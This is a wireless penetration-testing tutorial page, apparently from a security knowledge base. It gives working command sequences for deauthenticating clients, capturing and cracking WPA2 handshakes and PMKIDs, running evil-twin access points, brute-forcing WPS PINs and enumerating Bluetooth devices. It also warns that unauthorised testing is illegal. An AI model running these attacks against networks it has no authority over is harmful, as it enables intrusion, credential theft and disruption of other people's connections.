Wireless Attacks

Wireless Attacks

Auditing 802.11 networks and Bluetooth targets

11 min readUpdated 2026-04-16
#wifi#wpa2#wpa3#evil-twin#bluetooth#aircrack-ng#handshake
TL;DR
  • Your wireless adapter must support monitor mode and packet injection — most built-in adapters do not
  • The WPA2 four-way handshake is captured passively or triggered by deauthenticating a connected client
  • PMKID attack captures a crackable hash from the AP without needing any connected clients present
  • WPA2 cracking is offline — use hashcat with mode 22000 and a GPU; aircrack-ng on CPU is far slower
  • WPS is fundamentally broken — around 11,000 PIN attempts (Reaver/Bully) recovers the passphrase on vulnerable routers

Overview

Wireless attacks target the radio-frequency layer — Wi-Fi (802.11) and Bluetooth being the most common. Unlike wired attacks, the attack surface is physical: range, antenna gain, and RF environment matter as much as software. A wireless audit begins with putting your adapter into monitor mode and ends with either cracked credentials or a map of network exposures.

Prerequisites

  • A wireless adapter that supports monitor mode and packet injection (see Hardware Requirements below — not all adapters work)
  • Basic understanding of 802.11 networking: SSIDs, BSSIDs, channels, WPA2 authentication flow
  • Kali Linux with the aircrack-ng suite pre-installed (sudo apt install aircrack-ng)

Recommended lab: Build a practice environment using a spare router with WPA2. Capture and crack handshakes against your own network. Never test against networks you do not own or have written authorisation to test — this is illegal in most jurisdictions.

Hardware Requirements

Not all adapters support the packet injection and monitor mode needed for offensive wireless work. Recommended chipsets on Kali:

ChipsetAdapter ExampleCapabilities
Alfa AWUS036ACHALFAMonitor, inject, 802.11ac
Alfa AWUS036NHALFAMonitor, inject, 802.11n
TP-Link TL-WN722N (v1 only)TP-LinkMonitor, inject, 802.11n
bash
# Check if your adapter supports monitor mode
iw list | grep "Supported interface modes" -A 10

# Check for injection support
aireplay-ng --test wlan0

Monitor Mode

bash
# Put adapter into monitor mode
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

# Or use airmon-ng (kills interfering processes automatically)
airmon-ng check kill
airmon-ng start wlan0

# Verify
iwconfig wlan0mon

WPA2 Handshake Capture

The four-way handshake is captured when a client authenticates. You either wait for a natural connection or force a deauthentication.

bash
# Scan for networks
airodump-ng wlan0mon

# Target a specific AP — capture handshakes to file
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Deauth a client to force reauthentication (in separate terminal)
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

# Verify handshake captured
aircrack-ng capture-01.cap

Cracking the Handshake

bash
# Dictionary attack with aircrack-ng
aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt

# Convert to hashcat format for GPU acceleration
hcxpcapngtool -o hash.hc22000 capture-01.cap

# Crack with hashcat (WPA2 = mode 22000)
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

PMKID Attack (Clientless)

PMKID attack doesn't require capturing a handshake — it works with just the AP's beacon.

bash
# Capture PMKID with hcxdumptool
hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

# Extract hash
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng

# Crack
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt

Evil Twin / Rogue AP

A rogue AP impersonates a legitimate network to intercept credentials or force clients onto an attacker-controlled network.

bash
# hostapd-wpe — WPA Enterprise attack / credential capture
apt install hostapd-wpe
# Configure /etc/hostapd-wpe/hostapd-wpe.conf with target SSID
hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

# airbase-ng — create a rogue open AP
airbase-ng -e "FreeWifi" -c 6 wlan0mon

# Full evil twin with captive portal — use airgeddon
airgeddon

WPS Attacks

WPS (Wi-Fi Protected Setup) has a fundamental flaw allowing the PIN to be brute-forced in ~11,000 attempts.

bash
# Check for WPS
wash -i wlan0mon

# Pixie Dust attack (fast, against vulnerable routers)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv

# Brute force WPS PIN
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vvv

Bluetooth Attacks

bash
# Scan for Bluetooth devices
hcitool scan
bluetoothctl
  > scan on
  > devices

# BlueZ tools — L2CAP ping (test connectivity)
l2ping -c 5 AA:BB:CC:DD:EE:FF

# Enumerate services on a device
sdptool browse AA:BB:CC:DD:EE:FF

# BLE scanning (IoT devices)
hcitool lescan
gatttool -b AA:BB:CC:DD:EE:FF --interactive
  > connect
  > primary           # list services
  > char-read-hnd 1   # read characteristic

Operational Notes

  • Channel hopping vs fixedairodump-ng hops by default; fix the channel (-c 6) once you've identified your target.
  • 2.4 GHz vs 5 GHz — most adapters do 2.4 GHz. For 5 GHz capture you need a dual-band adapter.
  • WPA3 SAE — resistant to offline dictionary attacks; dragonblood attacks exist but require specific conditions.
  • Legal boundary — packet injection on networks you don't own or have written permission to test is illegal in most jurisdictions.

What to Read Next

  • Password Attacks — cracking the captured WPA2 handshake uses the same hashcat workflow covered there
  • Post-Exploitation — once on the wireless network, pivot to wired assets and internal services
  • Reconnaissance — passive wireless recon (wardriving, beacon analysis) feeds into broader target mapping
← PreviousActive Directory ExploitationNext →Network Traffic Analysis
← back to knowledge base